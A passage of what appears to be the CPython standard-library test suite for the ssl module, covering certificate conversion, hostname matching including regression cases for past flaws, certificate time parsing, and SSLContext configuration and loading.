('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match one left-most wildcard
cert = {'subject': ((('commonName', 'f*.com'),),)}
ok(cert, 'foo.com')
ok(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
ok(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
        # No DNS entry in subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.com'),),)}
ok(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b.co*'),),)}
fail(cert, 'axxb.com')
cert = {'subject': ((('commonName', 'a*b*.com'),),)}
with self.assertRaises(ssl.CertificateError) as cm:
ssl.match_hostname(cert, 'axxbxxc.com')
self.assertIn("too many wildcards", str(cm.exception))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen()
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
        # no special treatment for the special value:
        # 99991231235959Z (RFC 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
@skip_if_broken_ubuntu_ssl
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
